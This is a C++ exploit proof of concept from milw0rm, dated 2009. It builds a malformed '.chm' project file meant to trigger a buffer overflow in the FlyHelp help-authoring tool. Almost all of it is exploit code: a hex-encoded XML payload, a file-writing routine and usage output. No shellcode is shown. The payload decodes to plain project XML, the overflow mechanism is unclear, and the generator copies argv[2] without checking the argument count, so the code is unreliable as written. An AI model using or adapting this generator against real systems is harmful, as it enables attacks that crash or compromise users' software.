186 lines
No EOL
11 KiB
C++
186 lines
No EOL
11 KiB
C++
/*
|
|
<<Name >>flyhelp.cpp
|
|
FlyHelp .CHM File Buffer Overflo POC
|
|
<<Credits >>fl0 fl0w
|
|
<<Website >>http://www.sploitz.10001mb.com
|
|
*/
|
|
|
|
/*
|
|
<<DEMO >>
|
|
C:\Documents and Settings\Stefan\Desktop\New Folder1>flyhelp.exe
|
|
|
|
C:\Documents and Settings\Stefan\Desktop\New Folder1>flyhelp.exe -file test
|
|
|
|
***************************************************************************
|
|
FlyHelp .CHM File Buffer Overflo POC
|
|
Usage is flyhelp.exe -file filename
|
|
Credits fl0 fl0w
|
|
***************************************************************************
|
|
File build !
|
|
|
|
*/
|
|
#include <stdio.h>
|
|
#include <string.h>
|
|
#include <stdio.h>
|
|
#include <assert.h>
|
|
#include <windows.h>
|
|
|
|
#define SIZE 100000
|
|
|
|
char rawData[1471] =
|
|
{
|
|
0x3C, 0x3F, 0x78, 0x6D, 0x6C, 0x20, 0x76, 0x65, 0x72, 0x73, 0x69, 0x6F, 0x6E, 0x3D, 0x22, 0x31,
|
|
0x2E, 0x30, 0x22, 0x20, 0x65, 0x6E, 0x63, 0x6F, 0x64, 0x69, 0x6E, 0x67, 0x3D, 0x22, 0x57, 0x69,
|
|
0x6E, 0x64, 0x6F, 0x77, 0x73, 0x2D, 0x31, 0x32, 0x35, 0x32, 0x22, 0x20, 0x3F, 0x3E, 0x0D, 0x0A,
|
|
0x3C, 0x58, 0x4D, 0x4C, 0x43, 0x6F, 0x6E, 0x66, 0x69, 0x67, 0x3E, 0x3C, 0x69, 0x6E, 0x66, 0x6F,
|
|
0x3E, 0x43, 0x48, 0x4D, 0x20, 0x50, 0x72, 0x6F, 0x6A, 0x65, 0x63, 0x74, 0x3C, 0x2F, 0x69, 0x6E,
|
|
0x66, 0x6F, 0x3E, 0x0D, 0x0A, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x56, 0x65, 0x72, 0x73, 0x69,
|
|
0x6F, 0x6E, 0x22, 0x3E, 0x32, 0x30, 0x38, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x3C, 0x67, 0x20,
|
|
0x6E, 0x3D, 0x22, 0x43, 0x6F, 0x6E, 0x74, 0x65, 0x6E, 0x74, 0x73, 0x22, 0x3E, 0x0D, 0x0A, 0x20,
|
|
0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x43, 0x6F, 0x75, 0x6E, 0x74, 0x22, 0x3E, 0x30, 0x3C, 0x2F,
|
|
0x70, 0x3E, 0x0D, 0x0A, 0x3C, 0x2F, 0x67, 0x3E, 0x0D, 0x0A, 0x3C, 0x67, 0x20, 0x6E, 0x3D, 0x22,
|
|
0x46, 0x69, 0x6C, 0x65, 0x73, 0x22, 0x3E, 0x0D, 0x0A, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22,
|
|
0x43, 0x6F, 0x75, 0x6E, 0x74, 0x22, 0x3E, 0x30, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x3C, 0x2F,
|
|
0x67, 0x3E, 0x0D, 0x0A, 0x3C, 0x67, 0x20, 0x6E, 0x3D, 0x22, 0x4F, 0x70, 0x74, 0x69, 0x6F, 0x6E,
|
|
0x73, 0x22, 0x3E, 0x0D, 0x0A, 0x20, 0x3C, 0x67, 0x20, 0x6E, 0x3D, 0x22, 0x48, 0x48, 0x50, 0x22,
|
|
0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x3C, 0x67, 0x20, 0x6E, 0x3D, 0x22, 0x4F, 0x70, 0x74, 0x69, 0x6F,
|
|
0x6E, 0x73, 0x22, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x54,
|
|
0x69, 0x74, 0x6C, 0x65, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x3C,
|
|
0x70, 0x20, 0x6E, 0x3D, 0x22, 0x44, 0x65, 0x66, 0x61, 0x75, 0x6C, 0x74, 0x20, 0x74, 0x6F, 0x70,
|
|
0x69, 0x63, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20,
|
|
0x6E, 0x3D, 0x22, 0x4C, 0x61, 0x6E, 0x67, 0x75, 0x61, 0x67, 0x65, 0x22, 0x3E, 0x30, 0x78, 0x34,
|
|
0x30, 0x39, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D,
|
|
0x22, 0x46, 0x75, 0x6C, 0x6C, 0x2D, 0x74, 0x65, 0x78, 0x74, 0x20, 0x73, 0x65, 0x61, 0x72, 0x63,
|
|
0x68, 0x22, 0x3E, 0x31, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x3C, 0x2F, 0x67, 0x3E,
|
|
0x0D, 0x0A, 0x20, 0x20, 0x3C, 0x67, 0x20, 0x6E, 0x3D, 0x22, 0x57, 0x69, 0x6E, 0x64, 0x6F, 0x77,
|
|
0x73, 0x22, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x3C, 0x67, 0x20, 0x6E, 0x3D, 0x22, 0x4D, 0x61,
|
|
0x69, 0x6E, 0x22, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22,
|
|
0x50, 0x6F, 0x73, 0x69, 0x74, 0x69, 0x6F, 0x6E, 0x22, 0x3E, 0x5B, 0x38, 0x30, 0x2C, 0x36, 0x30,
|
|
0x2C, 0x36, 0x34, 0x30, 0x2C, 0x34, 0x38, 0x30, 0x5D, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20,
|
|
0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x53, 0x74, 0x6F, 0x72, 0x65, 0x50, 0x6F,
|
|
0x73, 0x69, 0x74, 0x69, 0x6F, 0x6E, 0x22, 0x3E, 0x31, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20,
|
|
0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x4E, 0x61, 0x76, 0x69, 0x67, 0x61, 0x74,
|
|
0x69, 0x6F, 0x6E, 0x50, 0x61, 0x6E, 0x65, 0x22, 0x3E, 0x31, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A,
|
|
0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x43, 0x6F, 0x6E, 0x74, 0x65, 0x6E,
|
|
0x74, 0x73, 0x49, 0x6E, 0x50, 0x61, 0x6E, 0x65, 0x22, 0x3E, 0x74, 0x65, 0x6D, 0x70, 0x2E, 0x68,
|
|
0x68, 0x63, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E,
|
|
0x3D, 0x22, 0x49, 0x6E, 0x64, 0x65, 0x78, 0x49, 0x6E, 0x50, 0x61, 0x6E, 0x65, 0x22, 0x3E, 0x3C,
|
|
0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x53,
|
|
0x65, 0x61, 0x72, 0x63, 0x68, 0x49, 0x6E, 0x50, 0x61, 0x6E, 0x65, 0x22, 0x3E, 0x3C, 0x2F, 0x70,
|
|
0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x41, 0x64, 0x76,
|
|
0x53, 0x65, 0x61, 0x72, 0x63, 0x68, 0x49, 0x6E, 0x50, 0x61, 0x6E, 0x65, 0x22, 0x3E, 0x3C, 0x2F,
|
|
0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x46, 0x61,
|
|
0x76, 0x6F, 0x72, 0x69, 0x74, 0x65, 0x73, 0x49, 0x6E, 0x50, 0x61, 0x6E, 0x65, 0x22, 0x3E, 0x3C,
|
|
0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x44,
|
|
0x65, 0x66, 0x61, 0x75, 0x6C, 0x74, 0x54, 0x61, 0x62, 0x22, 0x3E, 0x30, 0x3C, 0x2F, 0x70, 0x3E,
|
|
0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x54, 0x61, 0x62, 0x73,
|
|
0x50, 0x6F, 0x73, 0x69, 0x74, 0x69, 0x6F, 0x6E, 0x22, 0x3E, 0x30, 0x3C, 0x2F, 0x70, 0x3E, 0x0D,
|
|
0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x48, 0x69, 0x64, 0x65, 0x53,
|
|
0x68, 0x6F, 0x77, 0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x31, 0x3C, 0x2F, 0x70, 0x3E,
|
|
0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x42, 0x61, 0x63, 0x6B,
|
|
0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x31, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20,
|
|
0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x46, 0x6F, 0x72, 0x77, 0x61, 0x72, 0x64,
|
|
0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x31, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20,
|
|
0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x53, 0x74, 0x6F, 0x70, 0x42, 0x75, 0x74,
|
|
0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C,
|
|
0x70, 0x20, 0x6E, 0x3D, 0x22, 0x52, 0x65, 0x66, 0x72, 0x65, 0x73, 0x68, 0x42, 0x75, 0x74, 0x74,
|
|
0x6F, 0x6E, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70,
|
|
0x20, 0x6E, 0x3D, 0x22, 0x46, 0x6F, 0x6E, 0x74, 0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E,
|
|
0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22,
|
|
0x50, 0x72, 0x69, 0x6E, 0x74, 0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x3C, 0x2F, 0x70,
|
|
0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x4F, 0x70, 0x74,
|
|
0x69, 0x6F, 0x6E, 0x73, 0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E,
|
|
0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x4C, 0x6F, 0x63, 0x61,
|
|
0x74, 0x65, 0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A,
|
|
0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x48, 0x6F, 0x6D, 0x65, 0x42, 0x75,
|
|
0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20,
|
|
0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x48, 0x6F, 0x6D, 0x65, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E,
|
|
0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x4A, 0x75, 0x6D, 0x70,
|
|
0x31, 0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20,
|
|
0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x4A, 0x75, 0x6D, 0x70, 0x31, 0x22, 0x3E,
|
|
0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22,
|
|
0x4A, 0x75, 0x6D, 0x70, 0x31, 0x43, 0x61, 0x70, 0x74, 0x69, 0x6F, 0x6E, 0x22, 0x3E, 0x3C, 0x2F,
|
|
0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x4A, 0x75,
|
|
0x6D, 0x70, 0x32, 0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D,
|
|
0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x4A, 0x75, 0x6D, 0x70, 0x32,
|
|
0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E,
|
|
0x3D, 0x22, 0x4A, 0x75, 0x6D, 0x70, 0x32, 0x43, 0x61, 0x70, 0x74, 0x69, 0x6F, 0x6E, 0x22, 0x3E,
|
|
0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22,
|
|
0x4E, 0x65, 0x78, 0x74, 0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E,
|
|
0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x50, 0x72, 0x65, 0x76,
|
|
0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20,
|
|
0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x41, 0x75, 0x74, 0x6F, 0x53, 0x79, 0x6E, 0x63,
|
|
0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E,
|
|
0x3D, 0x22, 0x41, 0x75, 0x74, 0x6F, 0x53, 0x68, 0x6F, 0x77, 0x48, 0x69, 0x64, 0x65, 0x50, 0x61,
|
|
0x6E, 0x65, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70,
|
|
0x20, 0x6E, 0x3D, 0x22, 0x48, 0x69, 0x64, 0x65, 0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x43, 0x61,
|
|
0x70, 0x74, 0x69, 0x6F, 0x6E, 0x73, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20,
|
|
0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x43, 0x6C, 0x6F, 0x73, 0x65, 0x64, 0x50, 0x61,
|
|
0x6E, 0x65, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70,
|
|
0x20, 0x6E, 0x3D, 0x22, 0x50, 0x61, 0x6E, 0x65, 0x57, 0x69, 0x64, 0x74, 0x68, 0x22, 0x3E, 0x3C,
|
|
0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x3C, 0x2F, 0x67, 0x3E, 0x0D, 0x0A, 0x20, 0x20,
|
|
0x3C, 0x2F, 0x67, 0x3E, 0x0D, 0x0A, 0x20, 0x3C, 0x2F, 0x67, 0x3E, 0x0D, 0x0A, 0x3C, 0x2F, 0x67,
|
|
0x3E, 0x0D, 0x0A, 0x3C, 0x2F, 0x58, 0x4D, 0x4C, 0x43, 0x6F, 0x6E, 0x66, 0x69, 0x67, 0x3E,
|
|
} ;
|
|
|
|
class EXPLOIT {
|
|
public:
|
|
|
|
int check (char *, char *);
|
|
void Usage (char *);
|
|
};
|
|
|
|
static int Poz = 1;
|
|
static int Neg = 0;
|
|
|
|
int i;
|
|
|
|
char Name [SIZE];
|
|
char NeWbuff [SIZE];
|
|
|
|
|
|
int main (int argc, char *argv [])
|
|
|
|
{
|
|
|
|
EXPLOIT VIDEO;
|
|
VIDEO.Usage(argv [0]);
|
|
if(argc < 2) {
|
|
VIDEO.Usage(argv [0]);
|
|
exit(0);
|
|
}
|
|
if(VIDEO.check(argv [1], "-file") == Neg) {
|
|
fprintf(stdout , " Incorect input ");
|
|
printf(" \t..Usage is %s -file filename.. \n", Name);
|
|
exit(0);
|
|
}
|
|
FILE *f;
|
|
strcpy(Name, argv [2]);
|
|
strcat(Name, " .chm ");
|
|
f = fopen (Name, "w");
|
|
assert( f != NULL);
|
|
strncpy(NeWbuff , rawData , sizeof(rawData));
|
|
fputs("FILE \"", f);
|
|
fprintf( f, " %s ", NeWbuff);
|
|
fprintf( stdout , "File build ! ");
|
|
exit(0);
|
|
getchar();
|
|
return 0;
|
|
}
|
|
int EXPLOIT::check(char *Arg_, char *_Arg)
|
|
{
|
|
if(strcmp(Arg_, _Arg) == 0)
|
|
return Poz;
|
|
return Neg;
|
|
}
|
|
void EXPLOIT::Usage(char *Name)
|
|
{
|
|
system("cls");
|
|
printf("***************************************************************************\n");
|
|
printf("FlyHelp .CHM File Buffer Overflo POC\n");
|
|
printf(" \tUsage is %s -file filename\n", Name);
|
|
fprintf(stdout , "Credits fl0 fl0w\n");
|
|
printf("***************************************************************************\n");
|
|
}
|
|
|
|
// milw0rm.com [2009-07-21]
|